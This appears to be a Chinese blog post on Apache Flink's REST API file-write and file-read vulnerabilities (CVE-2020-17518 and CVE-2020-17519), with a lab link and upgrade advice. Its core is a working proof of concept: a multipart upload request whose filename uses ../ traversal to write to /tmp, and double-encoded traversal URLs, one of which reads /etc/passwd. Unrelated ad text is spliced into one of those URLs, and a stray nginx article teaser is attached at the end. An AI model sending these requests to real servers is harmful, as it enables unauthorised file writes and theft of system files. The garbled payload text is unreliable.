这篇文章给大家介绍Apache Flink的文件漏洞是怎样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。Apache Flink文件漏洞Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历。CVE-2020-17518: 文件写入漏洞攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)。CVE-2020-17519: 文件读取漏洞Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问到的) 。Apache Flink 1.5.1 ~ 1.11.2环境地址:https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518POST/jars/uploadHTTP/1.1Host: IP:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=—-WebKitFormBoundaryoZ8meKnrrso89R6YContent-Length: 189——WebKitFormBoundaryoZ8meKnrrso89R6YContent-Disposition: form-data; name=”jarfile”; filename=”../../../../../../../tmp/sucess”success——WebKitFormBoundaryoZ8meKnrrso89R6Y–访问:文件写入成功http://ip+port/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%免费云主机域名252f..%252f..%252f..%252f..%252f..%252ftmp%252fsucesshttp://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd访问路径获取passwd所有用户升级到Flink 1.11.3或1.12.0,下载链接为:https://flink.apache.org/downloads.htmlhttps://flink.apache.org/downloads.html关于Apache Flink的文件漏洞是怎样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
本文小编为大家详细介绍“nginx如何配置ssl”,内容详细,步骤清晰,细节处理妥当,希望这篇“nginx如何配置ssl”文章能帮助大家解决疑惑,下面跟着小编的思路慢慢深入,一起来学习新知识吧。单向SSL配置实例:配置说明:注意:nginx在源码安装的时候,默…
免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。